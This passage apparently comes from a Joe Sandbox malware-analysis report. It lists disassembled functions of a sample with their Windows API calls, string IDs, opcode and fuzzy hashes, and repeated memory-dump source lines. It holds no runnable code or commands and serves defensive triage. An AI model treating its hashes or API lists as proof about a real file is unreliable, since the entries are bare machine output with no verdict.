                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: =
                                                                        • API String ID: 3964851224-2322244508
                                                                        • Opcode ID: 8148b66f757a4eb95035aa28d3fc4ffd734558c7e30f4f4f20bb809f4103440f
                                                                        • Instruction ID: 189d5cc217fac44a839b3e7ed98406c7a7e68db2c17889ff2ba6232dca12b89c
                                                                        • Opcode Fuzzy Hash: 8148b66f757a4eb95035aa28d3fc4ffd734558c7e30f4f4f20bb809f4103440f
                                                                        • Instruction Fuzzy Hash: CB519071904109DACF15FFA8C885AFEB7B4FF54314F184036E406E7291EA319DA1DB96
                                                                        Function 008A2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 008A2968
                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 008A2981
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemorySleepStatus
                                                                        • String ID: @
                                                                        • API String ID: 2783356886-2766056989
                                                                        • Opcode ID: 00b3ee4a1cbcd8ae2362a71a305c9cb42a4bf3dc24dc48f53111330e08476458
                                                                        • Instruction ID: c326ac15fe70d766c5db0462927a236e93f26432e1c4b18b6851e2a371fff5c9
                                                                        • Opcode Fuzzy Hash: 00b3ee4a1cbcd8ae2362a71a305c9cb42a4bf3dc24dc48f53111330e08476458
                                                                        • Instruction Fuzzy Hash: C25149714187449BD720EF18DC85BAFBBE8FB85344F46885DF1D8810A1EB309929CB67
                                                                        Function 008F9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00894F0B: __fread_nolock.LIBCMT ref: 00894F29
                                                                        • _wcscmp.LIBCMT ref: 008F9824
                                                                        • _wcscmp.LIBCMT ref: 008F9837
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$__fread_nolock
                                                                        • String ID: FILE
                                                                        • API String ID: 4029003684-3121273764
                                                                        • Opcode ID: 1ba9f009c0d22000deeeda618fb40e1b6af56a206150a20eaf53f043b460d48c
                                                                        • Instruction ID: 6c20643e2c4eb27ce8110faac50a707b7d09a761ca3964fb9964c3f4545399d1
                                                                        • Opcode Fuzzy Hash: 1ba9f009c0d22000deeeda618fb40e1b6af56a206150a20eaf53f043b460d48c
                                                                        • Instruction Fuzzy Hash: D141A671A0021EBADF21AAA4CC45FEFBBBDFF85714F000479FA05E7181DA759A058B61
                                                                        Function 0090258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0090259E
                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009025D4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CrackInternet_memset
                                                                        • String ID: |
                                                                        • API String ID: 1413715105-2343686810
                                                                        • Opcode ID: f6fff2031a74b34ce984013aeb6b62ccb4cda9c315e4ef4e578903ae79e8c47a
                                                                        • Instruction ID: 72989e74d77e0c14cd2a727e47b88130daf6f215a6f092fc5dd9cb510d09c317
                                                                        • Opcode Fuzzy Hash: f6fff2031a74b34ce984013aeb6b62ccb4cda9c315e4ef4e578903ae79e8c47a
                                                                        • Instruction Fuzzy Hash: 6F310771814119EFCF01EFA4CC89EEEBFB9FF08310F14006AF915A6162EA315956DB61
                                                                        Function 00917A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00917B61
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00917B76
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: '
                                                                        • API String ID: 3850602802-1997036262
                                                                        • Opcode ID: a69f833fb25100ec1e3f6ec93948ef08bcecf5a155469f949da909cccfc207ac
                                                                        • Instruction ID: 3df0e1465c30d58e6b11a311839e3af50fd8a74209969f525603b3835544c275
                                                                        • Opcode Fuzzy Hash: a69f833fb25100ec1e3f6ec93948ef08bcecf5a155469f949da909cccfc207ac
                                                                        • Instruction Fuzzy Hash: 7F41D974B0920E9FDB14CFA5D991BDABBB9FF08300F14056AE9059B351D770A991CF90
                                                                        Function 00916A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00916B17
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00916B53
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DestroyMove
                                                                        • String ID: static
                                                                        • API String ID: 2139405536-2160076837
                                                                        • Opcode ID: 0171e5195a2061044246848c0d22be52af0589b7456e6ef3b7f6d2b46f0c5222
                                                                        • Instruction ID: 3bc26bf0fd3cc5fabd4a12ff1391429c5dc05167d9db5b9c8901dbbb6e4ced5e
                                                                        • Opcode Fuzzy Hash: 0171e5195a2061044246848c0d22be52af0589b7456e6ef3b7f6d2b46f0c5222
                                                                        • Instruction Fuzzy Hash: 1E31AF71610608AEEB109F68CC90BFB77ADFF48760F10861DF9A9D7190DA31AC81D760
                                                                        Function 008F28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F2911
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008F294C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        • Opcode ID: d700f57d78d3579c8ad596ccfab2f0c374e41692765e84d1c3f6f304d420785b
                                                                        • Instruction ID: 0f64ca643a40ec686a77b2f0c857e45dfed4a8db7e256ff35952f8256a4ada93
                                                                        • Opcode Fuzzy Hash: d700f57d78d3579c8ad596ccfab2f0c374e41692765e84d1c3f6f304d420785b
                                                                        • Instruction Fuzzy Hash: 9A317F3160030D9BEB248EA8C945BFEBFB5FF45354F140069EA85E71A1D7B09944DB52
                                                                        Function 009039E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __snwprintf.LIBCMT ref: 00903A66
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __snwprintf_memmove
                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                        • API String ID: 3506404897-2584243854
                                                                        • Opcode ID: 25fbaa6b621add1e73f116f1d5c2793fb1696e86a6b21ca66dc9aa31a69c10de
                                                                        • Instruction ID: 288d7b4bafb095f3119300402b7b435f9182e1549f37f9c152bc4fa4caf51d5c
                                                                        • Opcode Fuzzy Hash: 25fbaa6b621add1e73f116f1d5c2793fb1696e86a6b21ca66dc9aa31a69c10de
                                                                        • Instruction Fuzzy Hash: 97218C30714219AECF14FFA8CC82EAE77A9FF49300F044459E845EB181EB34EA45CB62
                                                                        Function 009166D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00916761
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0091676C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Combobox
                                                                        • API String ID: 3850602802-2096851135
                                                                        • Opcode ID: 056e3c7b20bb7ed7cdc24d34698e26ecba330adc10aa06254467ebc4081a297f
                                                                        • Instruction ID: a952e3c038ab7c810ee3e968dbdbe188f51b428f8e731dbb5baa93946bde5390
                                                                        • Opcode Fuzzy Hash: 056e3c7b20bb7ed7cdc24d34698e26ecba330adc10aa06254467ebc4081a297f
                                                                        • Instruction Fuzzy Hash: DB118B7170020CABEF219F54CC80EEB3B6EEB883A8F104129F918972D0D6319C9187A0
                                                                        Function 00916C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00891D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00891D73
                                                                          • Part of subcall function 00891D35: GetStockObject.GDI32(00000011), ref: 00891D87
                                                                          • Part of subcall function 00891D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00891D91
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00916C71
                                                                        • GetSysColor.USER32(00000012), ref: 00916C8B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                        • String ID: static
                                                                        • API String ID: 1983116058-2160076837
                                                                        • Opcode ID: a1cee8539b5de86ed38ab44fca29630227ad2f772e55f1a5f032c514d37fcc8e
                                                                        • Instruction ID: 95ac3e62efb0e872d8cbc467e96fa872bc2423c0ae1b0ceab84b0ae7bfc84ba5
                                                                        • Opcode Fuzzy Hash: a1cee8539b5de86ed38ab44fca29630227ad2f772e55f1a5f032c514d37fcc8e
                                                                        • Instruction Fuzzy Hash: 79212C72A1420DAFDF04DFA8CC45AFA7BA9FB08314F004529FA95D2250E635E851DB60
                                                                        Function 00916920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 009169A2
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009169B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        • Opcode ID: d968ddbf74831f63fe250a4901db3658a255448ee20fb2e109452a2f8adb2a58
                                                                        • Instruction ID: 609a5d0338b7c5508612c6b39f8b0d9547741dd4e340be7de32a618a1fee478b
                                                                        • Opcode Fuzzy Hash: d968ddbf74831f63fe250a4901db3658a255448ee20fb2e109452a2f8adb2a58
                                                                        • Instruction Fuzzy Hash: E2116D71A1020CABEF108E749C54AEB366EEB053B8F504728F9A5961E0C635DC91A760
                                                                        Function 008F29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F2A22
                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008F2A41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        • Opcode ID: 42c2bfc48b07e4c44c71a51f7d35349119defeaea33475cbba903df6f65d34b0
                                                                        • Instruction ID: 5750e08170d6455d23b4d199d14a2c6c00aa9ddbdba3f99d5e1b85198bbabd29
                                                                        • Opcode Fuzzy Hash: 42c2bfc48b07e4c44c71a51f7d35349119defeaea33475cbba903df6f65d34b0
                                                                        • Instruction Fuzzy Hash: 9011D032A2522CABCB30DABCD845BBA77BAFB45314F054021EA55E7290D770AD0AC791
                                                                        Function 009021D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0090222C
                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00902255
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$OpenOption
                                                                        • String ID: <local>
                                                                        • API String ID: 942729171-4266983199
                                                                        • Opcode ID: eab3aaafa6edd387d2c07db2b378d6d8cd2cb8619d4d772d009f1659b483d933
                                                                        • Instruction ID: cb3195ca875586e78586c0a7b1450dc93a603748f6ba0559c494446231c9bba3
                                                                        • Opcode Fuzzy Hash: eab3aaafa6edd387d2c07db2b378d6d8cd2cb8619d4d772d009f1659b483d933
                                                                        • Instruction Fuzzy Hash: 6A110270601225BEDB288F958C8CEFBFBACFF16755F10862AF92486080D2706894D6F0
                                                                        Function 008E8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008E8E73
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 372448540-1403004172
                                                                        • Opcode ID: 7636fd9b111067f174269cc7aae35ae552f3387ecfeb608b35be00b392a289c4
                                                                        • Instruction ID: 3651f7505b1a6ea04fc658816ef5da389fbe250e1d203fc651b1107090df972c
                                                                        • Opcode Fuzzy Hash: 7636fd9b111067f174269cc7aae35ae552f3387ecfeb608b35be00b392a289c4
                                                                        • Instruction Fuzzy Hash: 6B01DE71601229AB9F15FBA9CC519FE7768FF06320B080A19F826A72E1DE315808D651
                                                                        Function 008E8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 008E8D6B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 372448540-1403004172
                                                                        • Opcode ID: 1bcacea5cdac7226ca9988980904c4f7f58fdbfb3e3dd20cb17378ade0c163b3
                                                                        • Instruction ID: ccf552998e657638eb7a27899e3639bbb9654f52652f69d2455bbca0b783713b
                                                                        • Opcode Fuzzy Hash: 1bcacea5cdac7226ca9988980904c4f7f58fdbfb3e3dd20cb17378ade0c163b3
                                                                        • Instruction Fuzzy Hash: 5401B171B4110CABDF15EBE5CD52EFE77A8EF16340F140029B806A3291DE115A08D262
                                                                        Function 008E8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 008E8DEE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 372448540-1403004172
                                                                        • Opcode ID: 3d4c0f907bb7bea50f6c727c7e0629c57eafabce4e6d06efc130a42fcd5a56aa
                                                                        • Instruction ID: a8f753a6b76b46970b09b0ad764cb774b1634782881042d764753dbe12f6c51b
                                                                        • Opcode Fuzzy Hash: 3d4c0f907bb7bea50f6c727c7e0629c57eafabce4e6d06efc130a42fcd5a56aa
                                                                        • Instruction Fuzzy Hash: 4001F771B4510CA7DF15F6A9DD42EFE77A8EF16300F140015B806F3291DE115E08D272
                                                                        Function 008F4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
